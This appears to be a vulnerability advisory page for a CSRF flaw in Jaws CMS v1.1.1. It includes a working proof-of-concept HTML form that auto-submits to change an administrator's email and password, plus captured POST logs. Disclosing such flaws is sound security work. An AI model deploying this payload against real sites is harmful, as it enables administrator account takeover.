Vulners
Lucene search
Jaws CMS v1.1.1 - Privilege Escalate CSRF Vulnerability
Technical Details & Description:
================================
A cross site request forgery vulnerability has been discovered in the content management system Jaws official v1.1.1.
The vulnerability allows to perform malicious client-side web-application request to execute non-protected functions
with own web context.
In the absence of security token, an attacker could execute arbitrary code in the administrator's browser to gain
unauthorized access to the administrator privileges. The vulnerability is located in the edituser.php file of the
./user/account.html module. The request method to execute is POST and the attack vector is client-side performed
by the remote attacker.
Proof of Concept (PoC):
=======================
Cross site request forgery web vulnerability can be exploited by malicious web application without privileged user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: CSRF Exploitation
<html>
<h2>Privilege Escalate CSRF Vulnerability</h2>
<form name="profilebox" action="http://localhost.jaws-project.com/index.php" method="post">
<input type="hidden" name="gadget" value="Users" />
<input type="hidden" name="action" value="UpdateAccount" />
<div class="content">
<input type="hidden" name="email" id="profile_email" value="[email protected]" />
<input type="hidden" name="nickname" id="profile_nickname" value="VulnLabsAdministrator" />
<input type="hidden" name="password" id="profile_password" type="password" value="1234" />
<input type="hidden" name="password_check" id="profile_chkpasswd" type="password" value="1234" />
</div>
<div class="actions"><button type="submit" value="Update Account">Update Account</button></div>
<script>document.forms[0].submit()</script>
</form>
</div>
</html>
--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: jaws.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://jaws.localhost:8080/user/account.html
Cookie: JAWSSESSID=2-88361181057b9d4d878d1c6.98434178; VisitCounter=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
-
POST Method: gadget=Users&action=UpdateAccount&email=admin%40evilsource.com&nickname=VulnLabsAdministrator&password=1337&password_check=1337
Domain: www.zwx.fr
Contact: [email protected]
Social: twitter.com/XSSed.fr
Feeds: www.zwx.fr/feed/
Advisory: www.vulnerability-lab.com/show.php?user=ZwX
packetstormsecurity.com/files/author/12026/
cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
0day.today/author/27461
# 0day.today [2018-01-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Oct 2016 00:00Current
6.9Medium risk
Vulners AI Score6.9